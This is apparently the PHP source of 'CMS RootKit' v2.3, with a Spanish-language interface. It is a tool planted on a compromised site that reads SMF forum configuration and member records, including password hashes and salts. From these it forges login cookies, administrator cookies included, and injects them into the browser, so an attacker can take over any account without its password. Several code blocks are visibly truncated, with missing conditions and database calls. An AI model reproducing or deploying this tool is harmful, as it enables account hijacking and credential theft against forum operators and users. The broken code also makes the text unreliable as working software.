<?php
#################################################
# Archivo : rk.php #
# Nombre : CMS RootKit #
# Version : 2.3 Beta #
# Autor : WHK #
# Sistemas CMS soportados : SMF 1.1.4 #
#################################################
// Declaraciones, variables y constantes ============================================
$rk_path_smf = "./Settings.php";
$rk_path_wordpress = "./wp-config.php";
$rk_cms = rk_filtro($_GET["CMS"]);
$rk_id = rk_filtro($_GET["id"]);
// $rk_tipo_user = rk_filtro($_GET["tipo_user"]);
$rk_username = rk_filtro($_GET["username"]);
$rk_cookiename = urlencode($_GET["cookiename"]); $rk_id_MEMBER = rk_filtro($_GET["ID_MEMBER"]);
$rk_id_GROUP = rk_filtro($_GET["ID_GROUP"]);
$rk_passwd = rk_filtro($_GET["passwd"]);
$rk_passwordSalt = rk_filtro($_GET["passwordSalt"]);
$rk_header = "<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">
<html>
<head>
<title>CMS RootKit by WHK</title>
</head>
<body style=\"color: rgb(255, 255, 255); background-color: rgb(102, 0, 0);\" alink=\"white\" link=\"white\" vlink=\"white\">\n<div style=\"text-align: center;\">
<big>
<span style=\"font-weight: bold;\"><a href=\"?\">CMS RootKit by WHK</a></span>
</big><br />
</div><br /><br />
<table style=\"text-align: center; width: 100%; font-weight: bold;\" border=\"0\">
<tbody>
<tr>
<td>Herramientas</td>
</tr>
</tbody>
</table>
<table style=\"text-align: center; width: 100%;\" border=\"1\" cellpadding=\"0\" cellspacing=\"0\">
<tbody>
<tr>
<td><a href=\"?CMS=crear\">Crear cookie</a></td>
</tr>
</tbody>
</table>
<br /><br />";
$rk_footer = "</body>
</html>";
$rk_consola_a = "<span style=\"font-style: italic; font-weight: bold;\">Debugger</span><br />
<table style=\"text-align: left; width: 100%; color: rgb(51, 255, 51);\" border=\"2\" cellpadding=\"0\" cellspacing=\"0\">
<tbody>
<tr>
<td style=\"background-color: rgb(0, 0, 0);\">\n";
$rk_consola_b = "</td>
</tr>
</tbody>
</table>\n";
$rk_contenido_1 = "<br /><br />
<span style=\"font-weight: bold;\"> Haz click sobre el sistema CMS que deseas administrar.</span>\n";
$rk_contenido_2 = "<span style=\"font-weight: bold;\">Ingrese el nombre de usuario registrado para iniciar seción, o si
lo prefieres puedes ingresar únicamente el numero de usuario registrado.
(No se requiere password).<br /><br />
</span>
<form method=\"get\">
<input name=\"CMS\" value=\"SMF\" type=\"hidden\">
<table border=\"0\" cellpadding=\"1\" cellspacing=\"0\">
<tbody>
<tr>
<td>Username: </td>
<td><input name=\"username\" type=\"text\"></td>
<td><input value=\"Ingresar\" type=\"submit\"></td>
</tr>
</form>
<form method=\"get\">
<input name=\"CMS\" value=\"SMF\" type=\"hidden\">
<tr>
<td>Id Nº: </td>
<td><input name=\"id\" type=\"text\"></td>
<td><input value=\"Ingresar\" type=\"submit\"></td>
</tr>
</tbody>
</table>
</form>\n";
$rk_error_1 = "Falta cookiename";
$rk_error_2 = "Falta ID_MEMBER";
$rk_error_3 = "Falta passwd";
$rk_error_4 = "Falta passwordSalt";
$rk_error_5 = "Falta ID_GROUP";
$rk_comando_0 = "root@system:~$ <br />\n";
$rk_comando_1 = "root@system:~$ rk -cms verificar<br />\n";
$rk_comando_2 = "root@system:~$ rk -cms $rk_cms<br />\n";
$rk_comando_3 = "root@system:~$ rk -cms $rk_cms -username $rk_username<br />\n";
$rk_comando_4 = "root@system:~$ rk -cms $rk_cms -cookiename $rk_cookiename -ID_MEMBER $rk_id_MEMBER -passwd *** -passwordSalt $rk_passwordSalt<br />\n";
// ==================================================================================
// Funciónes ========================================================================
// Filtro ---------------------------------------------------------------------------
function rk_filtro($rk_input){
$rk_filtro = array("`", "´", '"', "<", ">", ";", "'", "%60", "%C2%B4", "%22", "%3E", "%3C","%27", "%25", "%"); for ($rk_i=0; $rk_i < count($rk_filtro) ; $rk_i++) { if(eregi($rk_filtro[$rk_i],$rk_input)) { echo "<center>Por razones de seguridad no puede mostrarse la página debido a que has ingresado<br />
uno o mas caracteres prohibidos (".htmlspecialchars($rk_filtro[$rk_i]).") dentro de algún campo.<br /><br /> <a href=\"$rk_referer\">Buelva a intentarlo por favor</a>.</center>\n";
}
}
}
// ----------------------------------------------------------------------------------
// Verificación de sistemas CMS -----------------------------------------------------
function rk_verificar($rk_vcms, $rk_path){
rk_consola("Se ha detectado un sistema <a style=\"color: rgb(51, 255, 51);\" href=\"?CMS=$rk_vcms\">$rk_vcms</a> en este directorio.");
return false;
} else {
return true;
}
}
// ----------------------------------------------------------------------------------
// Mensaje de error -----------------------------------------------------------------
function rk_error($rk_ferror){
echo "<font style='color: red'>[!] $rk_ferror</font><br />\n";
return true;
}
// ----------------------------------------------------------------------------------
// Mensaje rojo ---------------------------------------------------------------------
function rk_msg_rojo($rk_fcolor){
echo "<span style=\"font-weight: bold; color: rgb(204, 0, 0);\">$rk_fcolor</span>";
}
// ----------------------------------------------------------------------------------
// Mensaje verde --------------------------------------------------------------------
function rk_msg_verde($rk_fcolor){
echo "<span style=\"font-weight: bold; color: rgb(0, 153, 0);\">$rk_fcolor</span>";
}
// ----------------------------------------------------------------------------------
// Mensaje multicolor ---------------------------------------------------------------
function rk_msg_multicolor($rk_fcolor, $verificar){
if($verificar == "1"){
rk_msg_rojo($rk_fcolor);
} else {
rk_msg_verde($rk_fcolor);
}
}
// ----------------------------------------------------------------------------------
// Mensaje de consola ---------------------------------------------------------------
function rk_consola($rk_fconsola){
echo "[*] $rk_fconsola<br />\n";
}
// ----------------------------------------------------------------------------------
// ==================================================================================
// Inicio ===========================================================================
if($rk_cms == ""){
echo $rk_header;
echo $rk_consola_a;
echo $rk_comando_1;
rk_consola("Verificando sistemas CMS ...");
// Verificando sistemas CMS... -----------------------------------------------------
if (!rk_verificar("SMF", $rk_path_smf)) {
$rk_b = "1";
}
if (!rk_verificar("Wordpress", $rk_path_wordpress)) {
$rk_b = "1";
}
// ----------------------------------------------------------------------------------
if ($rk_b != "1") {
rk_error("No se ha detectado ningún sistema CMS.<br />\n");
echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_footer;
} else {
echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_contenido_1;
echo $rk_footer;
}
}
// ==================================================================================
// Crear cookie =====================================================================
$rk_e = "1";
if($rk_cms == "crear") {
if ($rk_cookiename == "") { $rk_f1 = "1" ; $rk_e++ ; }
if ($rk_id_MEMBER == "") { $rk_f2 = "1" ; $rk_e++ ; }
if ($rk_passwd == "") { $rk_f3 = "1" ; $rk_e++ ; }
if ($rk_passwordSalt == "") { $rk_f4 = "1" ; $rk_e++ ; }
if ($rk_id_GROUP == "") { $rk_f5 = "1" ; $rk_e++ ; }
if ($rk_e == "6") {
echo $rk_header;
echo "<span style=\"font-weight: bold; text-decoration: underline;\">SMF</span>
<form method=\"get\">
<table style=\"text-align: left; width: 100%;\" border=\"1\"
cellpadding=\"1\" cellspacing=\"0\">
<tbody>
<tr>
<td>
<input name=\"CMS\" value=\"crear\" type=\"hidden\">
<table border=\"0\" cellpadding=\"1\" cellspacing=\"0\">
<tbody>
<tr>
<td>cookiename: </td>
<td><input name=\"cookiename\" type=\"text\"></td>
</tr>
<tr>
<td>ID_MEMBER: </td>
<td><input name=\"ID_MEMBER\" type=\"text\"></td>
</tr>
<tr>
<td>Passwd (HASH): </td>
<td><input name=\"passwd\" type=\"text\"></td>
</tr>
<tr>
<td>passwordSalt: </td>
<td><input name=\"passwordSalt\" type=\"text\"></td>
</tr>
<tr>
<td>ID_GROUP: </td>
<td><input name=\"ID_GROUP\" type=\"text\"></td>
<td><input value=\"Generar cookie\" type=\"submit\"></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</form>
<br />
Ingresa los siguientes datos para generar tu cookie.";
echo $rk_footer;
} else {
if ($rk_e >= "2") {
echo "$rk_header $rk_consola_a $rk_comando_4";
if ($rk_f1 == "1") { rk_error("$rk_error_1"); }
if ($rk_f2 == "1") { rk_error("$rk_error_2"); }
if ($rk_f3 == "1") { rk_error("$rk_error_3"); }
if ($rk_f4 == "1") { rk_error("$rk_error_4"); }
if ($rk_f5 == "1") { rk_error("$rk_error_5"); }
echo "<br />$rk_comando_0\n$rk_consola_b ";
echo "<br /><span style=\"font-weight: bold; text-decoration: underline;\">SMF</span>
<form method=\"get\">
<table style=\"text-align: left; width: 100%;\" border=\"1\"
cellpadding=\"1\" cellspacing=\"0\">
<tbody>
<tr>
<td>
<input name=\"CMS\" value=\"crear\" type=\"hidden\">
<table border=\"0\" cellpadding=\"1\" cellspacing=\"0\">
<tbody>
<tr>
<td>";rk_msg_multicolor("cookiename:", $rk_f1);echo" </td>
<td><input name=\"cookiename\" type=\"text\" value=\"$rk_cookiename\"></td>
</tr>
<tr>
<td>";rk_msg_multicolor("ID_MEMBER:", $rk_f2);echo" </td>
<td><input name=\"ID_MEMBER\" type=\"text\" value=\"$rk_id_MEMBER\"></td>
</tr>
<tr>
<td>";rk_msg_multicolor("Passwd (HASH):", $rk_f3);echo" </td>
<td><input name=\"passwd\" type=\"text\" value=\"$rk_passwd\"></td>
</tr>
<tr>
<td>";rk_msg_multicolor("passwordSalt:", $rk_f4);echo" </td>
<td><input name=\"passwordSalt\" type=\"text\" value=\"$rk_passwordSalt\"></td>
</tr>
<tr>
<td>";rk_msg_multicolor("ID_GROUP:", $rk_f5);echo" </td>
<td><input name=\"ID_GROUP\" type=\"text\" value=\"$rk_id_GROUP\"></td>
<td><input value=\"Generar cookie\" type=\"submit\"></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</form>
<br />
Ingresa los siguientes datos para generar tu cookie.";
echo $rk_footer;
}
if ($rk_e == "1") {
echo $rk_header;
echo $rk_consola_a;
echo $rk_comando_4;
if($rk_id_GROUP == "1") {
// Administrador
rk_consola("Construyendo cookie...");
rk_consola("Datos:");
echo "<font style='color: red'>\n[!] cookiename: $rk_cookiename<br />\n";
echo "[!] ID_MEMBER: $rk_id_MEMBER<br />\n";
echo "[!] passwd (hash): $rk_passwd<br />\n";
echo "[!] passwordSalt: $rk_passwordSalt</font><br />\n";
rk_consola
("Cookie : $rk_cookiename=".urlencode("a:4:{i:0;s:1:\"$rk_id_MEMBER\";i:1;s:40:\"".sha1($rk_passwd.$rk_passwordSalt)."\";i:2;i:1196740416;i:3;i:0;}")); echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_footer;
}
if($rk_id_GROUP == "0") {
// Usuario
rk_consola("Construyendo cookie...");
rk_consola("Datos:");
echo "<font style='color: red'>\n[!] cookiename: $rk_cookiename<br />\n";
echo "[!] ID_MEMBER: $rk_id_MEMBER<br />\n";
echo "[!] passwd (hash): $rk_passwd<br />\n";
echo "[!] passwordSalt: $rk_passwordSalt</font><br />\n";
rk_consola
("Cookie : $rk_cookiename=".urlencode("a:4:{i:0;i:$rk_id_MEMBER;i:1;s:40:\"".sha1($rk_passwd.$rk_passwordSalt)."\";i:2;i:1196740416;i:3;i:0;}")); echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_footer;
}
}
}
}
// ==================================================================================
// SMF ==============================================================================
if($rk_cms == "SMF") {
echo $rk_header;
echo $rk_consola_a;
if($rk_username != ""){
echo $rk_comando_3;
} else {
echo $rk_comando_2;
}
// Verificando la existencia de SMF -------------------------------------------------
rk_consola("Verificando sistema SMF...");
include($rk_path_smf);
rk_consola("Verifición satisfactoria.");
} else {
rk_error("No existe el sistema CMS en este directorio.");
echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_footer;
}
// Definiendo conexión SQL ---------------------------------------------------------
// ----------------------------------------------------------------------------------------
// Función de la consulta SQL -------------------------------------------------------
function rk_db_query($rk_sql){
rk_error("Error en la conección.");
return false;
}
rk_error("Error al seleccionar la base de datos.");
return false;
}
rk_error("Error al efectuar la busqueda.");
return false;
}
return $rk_query;
}
// Verificando ID_MEMBER y memberName ------------------------------------------------
$rk_consulta2 = "SELECT ID_MEMBER FROM `".$db_prefix."members`";
if ($rk_id != "") {
$rk_consulta = "SELECT * FROM `".$db_prefix."members` WHERE ID_MEMBER = $rk_id";
$c_ = "1";
}
if ($c_ != "1") {
if ($rk_username != "") {
$rk_consulta = "SELECT * FROM `".$db_prefix."members` WHERE `memberName` LIKE CONVERT(_utf8 '$rk_username' USING latin1) COLLATE latin1_swedish_ci";
}
}
// Buscando usuario ------------------------------------------------------------------
rk_consola("Conectando...");
if(($rk_username == "") and ($rk_id == "")){
if ($rk_query = rk_db_query($rk_consulta2)){
$rk_whk = "1";
foreach ($rk_row as $rk_out)
$rk_whk++;
}
$rk_whk_out = $rk_whk - 1;
rk_consola("Conección satisfactoria.");
}
rk_consola("Numero de usuarios registrados: $rk_whk_out");
echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_contenido_2;
echo $rk_footer;
} else {
if ($rk_query = rk_db_query($rk_consulta)){
rk_consola("Conección satisfactoria.");
if ($c_ == "1") {
rk_consola("Buscando usuario Nº$rk_id ...");
} else {
rk_consola("Buscando usuario $rk_username...");
}
$rk_whk = 1;
foreach ($rk_row as $rk_out){
if ($rk_whk == "1" ){ $rk_idMEMBER_out = $rk_out; }
if ($rk_whk == "2" ){ $rk_usernameout = $rk_out; }
if ($rk_whk == "5" ){ $rk_idGROUP_out = $rk_out; }
if ($rk_whk == "14"){ $rk_passwd_out = $rk_out; }
if ($rk_whk == "52"){ $rk_passwordSalt_out = $rk_out; }
$rk_whk++;
}
}
}
}
// Aplicando cookie ------------------------------------------------------------------
if($rk_idGROUP_out == "1") {
// Administrador
rk_consola("Usuario encontrado. Construyendo cookie...");
rk_consola("Datos:");
echo "<font style='color: red'>\n[!] cookiename: $cookiename<br />\n";
echo "[!] Username: $rk_usernameout<br />\n";
echo "[!] ID_MEMBER: $rk_idMEMBER_out<br />\n";
echo "[!] passwd (hash): $rk_passwd_out<br />\n";
echo "[!] passwordSalt: $rk_passwordSalt_out<br />\n";
echo "[!] ID_GROUP: $rk_idGROUP_out (Administrador)</font><br />\n";
echo "<script>void(document.cookie='$cookiename=".urlencode("a:4:{i:0;s:1:\"$rk_idMEMBER_out\";i:1;s:40:\"".sha1($rk_passwd_out.$rk_passwordSalt_out)."\";i:2;i:1196740416;i:3;i:0;}")."');</script>\n"; rk_consola("Cookie aplicada.");
}
if($rk_idGROUP_out == "0") {
// Usuario
rk_consola("Usuario encontrado. Construyendo cookie...");
rk_consola("Datos:");
echo "<font style='color: red'>\n[!] cookiename: $cookiename<br />\n";
echo "[!] Username: $rk_usernameout<br />\n";
echo "[!] ID_MEMBER: $rk_idMEMBER_out<br />\n";
echo "[!] passwd (hash): $rk_passwd_out<br />\n";
echo "[!] passwordSalt: $rk_passwordSalt_out<br />\n";
echo "[!] ID_GROUP: $rk_idGROUP_out (Usuario)</font><br />\n";
echo "<script>void(document.cookie='$cookiename=".urlencode("a:4:{i:0;i:$rk_idMEMBER_out;i:1;s:40:\"".sha1($rk_passwd_out.$rk_passwordSalt_out)."\";i:2;i:1196740416;i:3;i:0;}")."');</script>\n"; rk_consola("Cookie aplicada.");
}
if($rk_idGROUP_out == "") {
// Ninguno
rk_error("Usuario inexistente.<br />\n");
}
echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_contenido_2;
echo $rk_footer;
}
// ----------------------------------------------------------------------------------
// ==================================================================================
// Wordpress ========================================================================
if($rk_cms == "Wordpress") {
echo $rk_header;
echo $rk_consola_a;
echo $rk_comando_2;
rk_error("En construcción.");
echo "<br />$rk_comando_0\n";
echo $rk_consola_b;
echo $rk_footer;
}
// ==================================================================================
?>